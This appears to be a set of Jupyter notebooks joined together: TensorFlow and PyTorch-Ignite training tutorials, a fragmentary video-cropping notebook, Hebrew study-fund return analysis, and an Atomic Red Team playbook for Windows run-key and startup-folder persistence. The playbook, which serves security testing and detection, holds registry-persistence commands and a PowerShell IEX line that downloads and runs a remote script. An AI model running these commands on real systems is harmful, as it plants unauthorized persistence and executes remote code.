설정하고 아래 예제를 실행하면, 여러 장비를 활용하여 훈련 속도가 빨라지는 것을 볼 수 있습니다. ``` NUM_WORKERS = 2 # 여기서 배치 크기는 워커의 수를 곱한 크기로 늘려야 합니다. `tf.data.Dataset.batch`에는 # 전역 배치 크기를 지정해야 하기 때문입니다. 전에는 64였지만, 이제 128이 됩니다. GLOBAL_BATCH_SIZE = 64 * NUM_WORKERS train_datasets = train_datasets_unbatched.batch(GLOBAL_BATCH_SIZE) with strategy.scope(): multi_worker_model = build_and_compile_cnn_model() multi_worker_model.fit(x=train_datasets, epochs=3) ``` ### 데이터셋 샤딩과 배치 크기 다중 워커 훈련에서는 수렴과 성능을 위하여 데이터를 여러 부분으로 샤딩(sharding)해야 합니다. 하지만, 위 코드 예에서는 데이터셋을 샤딩하지 않고 바로 `model.fit()`으로 보낸 것을 볼 수 있습니다. 이는 `tf.distribute.Strategy` API가 다중 워커 훈련에 맞게 자동으로 데이터셋을 샤딩해주기 때문입니다. 만약 훈련할 때 샤딩을 직접 하고 싶다면, `tf.data.experimental.DistributeOptions` API를 사용해서 자동 샤딩 기능을 끌 수 있습니다. 다음과 같이 말입니다. 
``` options = tf.data.Options() options.experimental_distribute.auto_shard = False train_datasets_no_auto_shard = train_datasets.with_options(options) ``` 또 하나 주목할 점은 `datasets`의 배치 크기입니다. 앞서 코드에서 `GLOBAL_BATCH_SIZE = 64 * NUM_WORKERS`로 지정하였습니다. 단일 워커일 때보다 `NUM_WORKERS` 배만큼 크게 지정한 것입니다. 이는 실제로 각 워커에 전달되는 배치 크기가 `tf.data.Dataset.batch()`에 매개변수로 전달된 전역 배치 크기를 워커의 수로 나눈 것이 되기 때문입니다. 즉, 이렇게 바꾸어야 실제로 워커가 처리하는 배치 크기가 단일 워커일 때와 동일한 값이 됩니다. ## 성능 이제 케라스 모델이 완성되었습니다. `MultiWorkerMirroredStrategy`를 사용하여 여러 워커를 사용하여 훈련할 수 있습니다. 다중 워커 훈련의 성능을 더 높이려면 다음 기법들을 확인해 보십시오. * `MultiWorkerMirroredStrategy`는 여러 가지 [수집 작업 통신 구현체](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/distribute/cross_device_ops.py)를 제공합니다. `RING`(링)은 링 구조 기반의 수집 작업 구현체이고, 장비 간 통신을 위하여 gRPC를 사용합니다. `NCCL`은 [Nvidia의 NCCL](https://developer.nvidia.com/nccl)로 수집 작업을 구현한 것입니다. `AUTO`를 지정하면, 런타임이 알아서 선택합니다. 어떤 수집 작업 구현체가 최적인지는 GPU의 종류와 수, 클러스터 내 네트워크 연결 등 여러 요소에 따라 달라집니다. 런타임이 알아서 선택한 것을 바꾸려면, `MultiWorkerMirroredStrategy` 생성자의 `communication` 매개변수에 적절한 값을 지정하십시오. 예를 들면 `communication=tf.distribute.experimental.CollectiveCommunication.NCCL`과 같이 지정합니다. * 가능하면 변수를 `tf.float` 타입으로 바꾸십시오. 공식 ResNet 모델을 보면 어떻게 바꾸는지 [예제](https://github.com/tensorflow/models/blob/8367cf6dabe11adf7628541706b660821f397dce/official/resnet/resnet_model.py#L466)가 있습니다. ## 내결함성 동기 훈련 방식에서는, 워커 중 하나가 죽으면 전체 클러스터가 죽어버리고, 복구 메커니즘이 따로 없습니다. 하지만 케라스와 `tf.distribute.Strategy`를 함께 사용하면, 워커가 죽거나 불안정해지는 경우에도 내결함성을 제공합니다. 이는 사용자가 선택한 분산 파일 시스템에 훈련 상태를 저장하는 기능을 제공하기 때문입니다. 기존 인스턴스가 죽거나 정지당해서 재시작되는 경우에도 훈련 상태를 복구할 수 있습니다. 모든 워커가 훈련 에포크 혹은 스텝에 따라 동기화되므로, 다른 워커들은 죽거나 정지당한 워커가 복구될 때까지 기다려야 합니다. ### ModelCheckpoint 콜백 다중 워커 훈련의 내결함 기능을 사용하려면, `tf.keras.Model.fit()`를 호출할 때 `tf.keras.callbacks.ModelCheckpoint`의 인스턴스를 제공해야 합니다. 이 콜백이 체크포인트와 훈련 상태를 `ModelCheckpoint`의 `filepath` 매개변수에 지정한 디렉터리에 저장합니다. ``` # `filepath` 매개변수를 모든 워커가 접근할 수 있는 파일 시스템 경로로 바꾸십시오. 
callbacks = [tf.keras.callbacks.ModelCheckpoint(filepath='/tmp/keras-ckpt')] with strategy.scope(): multi_worker_model = build_and_compile_cnn_model() multi_worker_model.fit(x=train_datasets, epochs=3, callbacks=callbacks) ``` 워커가 정지당하면, 정지당한 워커가 다시 살아날 때까지 전체 클러스터가 잠시 멈춥니다. 워커가 클러스터에 다시 들어오면, 다른 워커도 재시작됩니다. 모든 워커가 이전에 저장한 체크포인트 파일을 읽고, 예전 상태를 불러오면 클러스터가 다시 일관된 상태가 됩니다. 그리고서 훈련이 재개됩니다. `ModelCheckpoint`의 `filepath`가 위치한 디렉터리를 살펴보면, 임시로 생성된 체크포인트 파일들을 확인할 수 있을 것입니다. 이 파일들은 실패한 작업을 복구하는데 필요한 것들로, 다중 워커 훈련 작업을 성공적으로 마치고 나면 `tf.keras.Model.fit()` 함수가 끝날 때 라이브러리가 알아서 삭제할 것입니다. ## 참조 1. [텐서플로로 분산 훈련하기](https://www.tensorflow.org/guide/distributed_training) 가이드는 사용 가능한 분산 전략들을 개괄하고 있습니다. 2. 공식 [ResNet50](https://github.com/tensorflow/models/blob/master/official/resnet/imagenet_main.py) 모델은 `MirroredStrategy`나 `MultiWorkerMirroredStrategy`로 훈련할 수 있습니다.
github_jupyter
# Chapter 13: Going Deeper -- the Mechanics of PyTorch (Part 3/3) ## Higher-level PyTorch APIs: a short introduction to PyTorch-Ignite ### Setting up the PyTorch model ``` import torch import torch.nn as nn from torch.utils.data import DataLoader from torchvision.datasets import MNIST from torchvision import transforms image_path = './' torch.manual_seed(1) transform = transforms.Compose([ transforms.ToTensor() ]) mnist_train_dataset = MNIST( root=image_path, train=True, transform=transform, download=True ) mnist_val_dataset = MNIST( root=image_path, train=False, transform=transform, download=False ) batch_size = 64 train_loader = DataLoader( mnist_train_dataset, batch_size, shuffle=True ) val_loader = DataLoader( mnist_val_dataset, batch_size, shuffle=False ) def get_model(image_shape=(1, 28, 28), hidden_units=(32, 16)): input_size = image_shape[0] * image_shape[1] * image_shape[2] all_layers = [nn.Flatten()] for hidden_unit in hidden_units: layer = nn.Linear(input_size, hidden_unit) all_layers.append(layer) all_layers.append(nn.ReLU()) input_size = hidden_unit all_layers.append(nn.Linear(hidden_units[-1], 10)) all_layers.append(nn.Softmax(dim=1)) model = nn.Sequential(*all_layers) return model device = "cuda" if torch.cuda.is_available() else "cpu" model = get_model().to(device) loss_fn = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=0.001) ``` ### Setting up training and validation engines with PyTorch-Ignite ``` from ignite.engine import Events, create_supervised_trainer, create_supervised_evaluator from ignite.metrics import Accuracy, Loss trainer = create_supervised_trainer( model, optimizer, loss_fn, device=device ) val_metrics = { "accuracy": Accuracy(), "loss": Loss(loss_fn) } evaluator = create_supervised_evaluator( model, metrics=val_metrics, device=device ) ``` ### Creating event handlers for logging and validation ``` # How many batches to wait before logging training status log_interval = 100 
@trainer.on(Events.ITERATION_COMPLETED(every=log_interval)) def log_training_loss(): e = trainer.state.epoch max_e = trainer.state.max_epochs i = trainer.state.iteration batch_loss = trainer.state.output print(f"Epoch[{e}/{max_e}], Iter[{i}] Loss: {batch_loss:.2f}") @trainer.on(Events.EPOCH_COMPLETED) def log_validation_results(): eval_state = evaluator.run(val_loader) metrics = eval_state.metrics e = trainer.state.epoch max_e = trainer.state.max_epochs acc = metrics['accuracy'] avg_loss = metrics['loss'] print(f"Validation Results - Epoch[{e}/{max_e}] Avg Accuracy: {acc:.2f} Avg Loss: {avg_loss:.2f}") ``` ### Setting up training checkpoints and saving the best model ``` from ignite.handlers import Checkpoint, DiskSaver # We will save in the checkpoint the following: to_save = {"model": model, "optimizer": optimizer, "trainer": trainer} # We will save checkpoints to the local disk output_path = "./output" save_handler = DiskSaver(dirname=output_path, require_empty=False) # Set up the handler: checkpoint_handler = Checkpoint( to_save, save_handler, filename_prefix="training") # Attach the handler to the trainer trainer.add_event_handler(Events.EPOCH_COMPLETED, checkpoint_handler) # Store best model by validation accuracy best_model_handler = Checkpoint( {"model": model}, save_handler, filename_prefix="best", n_saved=1, score_name="accuracy", score_function=Checkpoint.get_default_score_fn("accuracy"), ) evaluator.add_event_handler(Events.COMPLETED, best_model_handler) ``` ### Setting up TensorBoard as an experiment tracking system ``` from ignite.contrib.handlers import TensorboardLogger, global_step_from_engine tb_logger = TensorboardLogger(log_dir=output_path) # Attach handler to plot trainer's loss every 100 iterations tb_logger.attach_output_handler( trainer, event_name=Events.ITERATION_COMPLETED(every=100), tag="training", output_transform=lambda loss: {"batch_loss": loss}, ) # Attach handler for plotting both evaluators' metrics after every epoch completes 
tb_logger.attach_output_handler( evaluator, event_name=Events.EPOCH_COMPLETED, tag="validation", metric_names="all", global_step_transform=global_step_from_engine(trainer), ) ``` ### Executing the PyTorch-Ignite model training code ``` trainer.run(train_loader, max_epochs=5) ``` --- Readers may ignore the next cell. ``` ! python ../.convert_notebook_to_script.py --input ch13_part3.ipynb --output ch13_part3.py ```
github_jupyter
# T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>. The following run keys are created by default on Windows systems: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. 
(Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> The following Registry keys can control automatic startup of services during boot: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code> Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs. 
Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on. By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs. ## Atomic Tests ``` #Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force ``` ### Atomic Test #1 - Reg Key Run Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. **Supported Platforms:** windows #### Attack Commands: Run with `command_prompt` ```command_prompt REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 1 ``` ### Atomic Test #2 - Reg Key RunOnce RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. 
**Supported Platforms:** windows #### Attack Commands: Run with `command_prompt` ```command_prompt REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 2 ``` ### Atomic Test #3 - PowerShell Registry RunOnce RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 3 ``` ### Atomic Test #4 - Suspicious vbs file run from startup Folder vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. 
root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" Copy-Item $PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 4 ``` ### Atomic Test #5 - Suspicious jse file run from startup Folder jse files can be placed in and run from the startup folder to maintain persistence. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" Copy-Item $PathToAtomicsFolder\T1547.001\src\jsestartup.jse "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 5 ``` ### Atomic Test #6 - Suspicious bat file run from startup Folder bat files can be placed in and executed from the startup folder to maintain persistence. Upon execution, cmd will be run and immediately closed. 
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. **Supported Platforms:** windows Elevation Required (e.g. root or admin) #### Attack Commands: Run with `powershell` ```powershell Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" ``` ``` Invoke-AtomicTest T1547.001 -TestNumbers 6 ``` ## Detection Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
github_jupyter
## Specify video that will be cropped and analyzed. **StaticVideo** should point to the video that is to be analyzed.
""" import kafka import os import sys import json import base64 import ssl import time import datetime import io from PIL import Image import logging import cv2 import matplotlib.pyplot as plt import numpy as np if '../juypter' not in sys.path: sys.path.insert(0, '../juypter') import credential import streams_aid as aid logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO")) # img_encoded = str(base64.b64encode(response.content).decode("utf-8")) # img_encoded = str(base64.b64encode(img).decode('utf-8')) def bts_to_img(bts): buff = np.fromstring(bts, np.uint8) buff = buff.reshape(1, -1) img = cv2.imdecode(buff, cv2.IMREAD_COLOR) return img def convertToRGB(image): return cv2.cvtColor(image, cv2.COLOR_BGR2RGB) def encode_img(img): """must be easier way""" with io.BytesIO() as output: img.save(output, format="JPEG") contents = output.getvalue() return base64.b64encode(contents).decode('ascii') def decode_img(bin64): """must be easier way""" img = Image.open(io.BytesIO(base64.b64decode(bin64))) return img ``` ## Get and image from video and set region of interest. ### collect one frame from the video ``` def collect_frames(video_url, frame_count=1, frame_modulo=24, debug=False): """collect a set of frames from the video to work out the cropping region. Notes: - pull out the frames based upon the modulo and frame_count - the correct way, find frames that hav signficant difference between each - now """ frames = [] """get the crop region for a video. [] pull up some frames... 
[x] - get cropper region
Requester is responsible for closing the producer.
## finish the frame
github_jupyter
``` %run "../Retropy_framework.ipynb" mdf = pd.read_csv("../Research/GemelNet.csv") mdf["month"] = pd.to_datetime(mdf["month"], format="%Y/%m/%d") mdf["month_return"] = pd.to_numeric(mdf["month_return"].astype(str).str.replace("%", ""), errors="coerce") mdf["net_flow"] = series_as_float(mdf["net_flow"]) mdf["AUM"] = series_as_float(mdf["AUM"]) #mdf = mdf.set_index("month") def getValue(df): df = df.set_index("month") ser = df["month_return"].dropna().copy() if len(ser) == 0: return pd.Series() prevMonth = ser.index[0] + pd.DateOffset(months=-1) ser[prevMonth] = 0 # we want the serie sto start at 1.0 ser = ser.sort_index() ser.index = ser.index + pd.DateOffset(months=1) return (1+ser.dropna()/100).cumprod() #sym = mdf[mdf["ID"] == 1544] #ym["month_return"] #getValue(sym).plot() def getKeren(id, usd=True): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] s = getValue(df) if usd: usdils = getForex("USD", "ILS") s = (s/usdils).dropna() if len(s) > 0: s = s / s[0] s.id = id fee_df = series_as_float(df["fee_assets"]).dropna() if fee_df.shape[0] > 0: s.fee = fee_df.iloc[0] else: s.fee = np.nan return wrap(s, name) def getAum(id): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] usdils = getForex("USD", "ILS") #aum = pd.to_numeric(df["AUM"].str.replace(",", "").replace("- - -", "")) #aum = pd.to_numeric(df["AUM"], errors="coerce") aum = series_as_float(df["AUM"]) aum.index = df["month"] aum = aum/usdils aum = wrap(aum.dropna(), name + " AUM") return aum def getFlow(id): df = mdf[mdf["ID"] == id] name = str(id) + " | " + df.iloc[0]["name"] usdils = getForex("USD", "ILS") #flow = pd.to_numeric(df["net_flow"].str.replace(",", "").replace("- - -", "")) flow = series_as_float(df["net_flow"]) flow.index = df["month"] flow = flow/usdils flow = wrap(flow.dropna(), name + " flow") return flow def getFlowSum(id): return getFlow(id).cumsum() ``` ### כל קרנות ההשתלמות מגמל.נט ``` allKranotIDs = set(mdf.loc[mdf["type"]=="קרן השתלמות", 
"ID"].values) allKranot = [] for id in allKranotIDs: keren = getKeren(id, usd=True) allKranot.append(keren) print(keren.name) allKranot = [s for s in allKranot if len(s.s) > 0] allKranotMenayot = [s for s in allKranot if "מניות" in s.name and not "ללא" in s.name and not "עד" in s.name and not "לפחות" in s.name] allKranotKlali = [s for s in allKranot if "כללי" in s.name and not "לפחות" in s.name] allKranotIBI = [s for s in allKranot if "אי.בי.אי" in s.name] allKranotAltshuler = [s for s in allKranot if "אלטשולר" in s.name] ``` ### השוואה של קרן השתלמות מחקה ממדי חול איי-בי-איי למדדי חול ``` s = getKeren(1544) bench = get("URTH") bench = wrap(get("SPY:50|VGK:30|EEM:13|EWJ:7", mode="NTR"), "composite NTR") benchTR = wrap(get("SPY:50|VGK:30|EEM:13|EWJ:7", mode="TR"), "composite TR") vt = get("VT", mode="NTR") show(s / bench, s, bench, vt, trim=True, legend=True) ``` ### השוואה של קרן השתלמות מחקה סנופי איי-בי-איי לסנופי ``` s = getKeren(2265) bench = get("SPXNTR@IC") spy = get("SPY", mode="NTR") x = (s / bench).dropna() show(x, s, bench, spy, trim=True) s = getKeren(9451) bench = get("SPXNTR@IC") spy = get("SPY", mode="NTR") x = (s / bench).dropna() show(x, s, bench, spy, trim=True) intergemel = getKeren(9451) ibi = getKeren(2265) show(ibi / intergemel, ibi, intergemel, 1) ``` ### קרנות של איי.בי.איי ``` lst = [s for s in allKranot if s.index[0].year < 2008 and "אי.בי.אי" in s.name] #lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) [(s.fee, s.name) for s in lst] base = get("VT:60|VFITX:40", mode="NTR") base = convertSeries(base, "USD", "ILS") basem = bom(base) lst = [s.dropna() for s in lst] medianSer = getMedianSer(lst) show(lst, base, basem, base/medianSer, 1, ta=True, legend=False) shown = show(lst, basem, ta=True, silent=True); allbases = mix("VT", "VFITX", n=10, mode="NTR") allbases = [convertSeries(b, "USD", "ILS") for b in allbases] 
allbases = list(map(bom, allbases)) allbases = trimBy(allbases, shown) showRiskReturn(shown + allbases) showRiskReturn(allbases, setlim=False, lines=True, color="green") showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") s = getKeren(1205) ases = [VXUS, SPY, IEF, get("USDILS@CUR"), GLD, VNQ, FDN] bases = [EIS, VXUS, SPY, QQQ, IEF, get(i_gbLcl)] bases = [EIS, VXUS, SPY, IEF] bases = ["VFINX", i_ac, gb, i_gb] bases = [bom(get(b, mode="NTR")) for b in bases] #bases = [boy(b) for b in bases] #s = boy(s) p = lrret(bases, s, sum1=True) show(p / s, 0, 1, log=False) #lrret([FDN, VXUS], VTI, sum1=True) #show(lup1) ``` ### השוואה של כל קרנות ההשתלמות במסלול כללי לתיק 60\40 פשוט ``` s = get("SPY", mode="NTR") # this is a lame implementation, as it doesn't take into account the tax bases of dividend reinvestment def liquidation(s): if "s" in dir(s): s = s.s return (s/s[0]-1)*0.75+1 show(s, liquidation(s), log=True, ta=True) def getMedianSer(lst): df = pd.DataFrame([s.s for s in lst]).T return wrap(df.median(axis=1), "median") def getMeanSer(lst): df = pd.DataFrame([s.s for s in lst]).T return wrap(df.mean(axis=1), "mean") from ipywidgets import interact, interactive, fixed, interact_manual import ipywidgets as widgets as_ILS = False as_liqduid = False usdils = getForex("ILS", "USD", inv=True) usdils.name = "USDILS|USDILS" stocks = wrap(get(f"{lc}:50|{i_ac}:50"), "~vt") allbases1 = mix(stocks, gb, n=10, mode="NTR") allbases1 = list(map(bom, allbases1)) allbases2 = mix(lc, gb, n=10, mode="NTR") allbases2 = list(map(bom, allbases2)) #allbases1 += [usdils] if as_ILS: allbases1 = [convertSeries(b, "USD", "ILS") for b in allbases1] allbases2 = [convertSeries(b, "USD", "ILS") for b in allbases2] if as_liqduid: allbases1 = [liquidation(b) for b in allbases1] allbases1 = allbases2 b = "VFINX:31|VGTSX:6|VFITX:52|MFBFX:11" b = bom(get(b)) ta = convertSeries(get('TA125@IC'), "ILS", "USD", inv=True) sources = [ta, lc, i_ac, gb, cb, usdils] sources = lmap(get, sources) 
sources = lmap(bom, sources) def f(year): lst = allKranotMenayot lst = allKranotKlali #lst = allKranot #lst = allKranotIBI if as_ILS: lst = [convertSeries(b, "USD", "ILS") for b in lst] if as_liqduid: lst = [liquidation(b) for b in lst] lst = [s for s in lst if s.index[0].year < year] lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = [s[str(year):] for s in lst] lst = [s for s in lst if s.shape[0] > 0] lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) #lst += [usdils, b] #print("\n".join([s.name for s in lst])) lst = doTrim(lst) allbases = trimBy(allbases1, lst) lst = trimBy(lst, allbases) if True: fits = [lrret(s, sources, sum1=False, fit_values=True, pos_weights=False, return_ser=True) for s in lst] names = [s.name for s in lst] df = pd.DataFrame(dict(zip(names, fits))) display(df) # shoe risk return if False: plt.figure(figsize=(16, 10)) showRiskReturn(lst, annotations=[s.name[::-1] for s in lst]) showRiskReturn(lst + allbases, annotations=False) showRiskReturn(allbases, setlim=False, lines=True, color="green", annotations=False) if len(allbases) > 6: showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") #showRiskReturn([usdils], setlim=False, lines=False, color="blue") plt.show() # show returns if False: if len(allbases) > 10: show(lst, allbases[0], allbases[10], allbases[6], legend=False, trim=False) # show relative returns if False: lst = [s / s[0] for s in lst] medianSer = getMeanSer(lst) lst = [s / medianSer for s in lst] show(lst, ta=False, legend=False) interact(f, year=widgets.IntSlider(min=2000,max=2018,step=1,value=2008)); s = getKeren(1204, usd=True) usdils = getForex("ILS", "USD", inv=True) ta = convertSeries(get('TA125@IC'), "ILS", "USD", inv=True) sources = [usdils, lc, gb, i_ac, EIS, 'TTA25@IC', em_gbLcl, em_gbUsd] sources = [ta, lc, i_ac, gb, cb, usdils] sources = lmap(get, sources) sources = lmap(bom, sources) b = "VFINX:34|VGTSX:6|VFITX:54|MFBFX:12" 
lrret(s, sources, sum1=False, fit_values=True, pos_weights=True, return_ser=True) #show(b) s = getKeren(579, usd=True) usdils = getForex("ILS", "USD", inv=True) sources = [usdils, lc, gb, i_ac, EIS, 'TTA25@IC'] sources = ['TA35@IC', lc] ta = get('TA35@IC') ta = convertSeries(ta, "ILS", "USD", inv=True) sources = [ta, lc, i_ac, gb, cb] sources = lmap(get, sources) sources = lmap(bom, sources) show_rolling_beta(s, sources, window=24, rsq=False, pvalue=False) lst = [s for s in allKranot if s.index[0].year < 2010 and "מניות" in s.name and not "ללא" in s.name and not "עד" in s.name] lst = [s for s in lst if not " ** " in s.name] # exclude exclusive funds for specific sectors lst = sorted(lst, key=lambda s: s.name.split("|")[1].strip(" *").split(" ")[0]) [(s.fee, s.name) for s in lst] base = get("VT:60|VFITX:40", mode="NTR") basem = bom(base) lst = [s.dropna() for s in lst] medianSer = getMedianSer(lst) show(lst, base, basem, base/medianSer, 1, ta=True, legend=False) shown = show(lst, basem, ta=True, silent=True); allbases = mix("VT", "VFITX", n=10, mode="NTR") allbases = list(map(bom, allbases)) allbases = trimBy(allbases, shown) showRiskReturn(shown + allbases) showRiskReturn(allbases, setlim=False, lines=True, color="green") showRiskReturn([allbases[6]], setlim=False, lines=True, color="red") ``` ### השוואה של כל קרנות ההשתלמות במסלול כללי לתיק 60\40 פשוט - השוואה יחסית בין הקרנות ``` lst = trimBy(lst, lst) lst = [s / s[0] for s in lst] # finals = [(s, s[-1]) for s in lst] # finals = sorted(finals, key=lambda x: x[1]) # medianSer = finals[len(finals) // 2][0] medianSer = getMedianSer(lst) lst2 = [s / medianSer for s in lst] show(lst2, base, ta=False, legend=False) ``` ## סך נכסים מנוהלים וצבירה נטו לפי סוג קופה ``` aum = mdf.groupby(["month", "type"])["AUM"].sum() aum = aum.unstack() show(aum, ta=False, log=False, title="AUM") net_flow = mdf.groupby(["month", "type"])["net_flow"].sum() net_flow = net_flow.unstack() net_flow = net_flow.cumsum() total 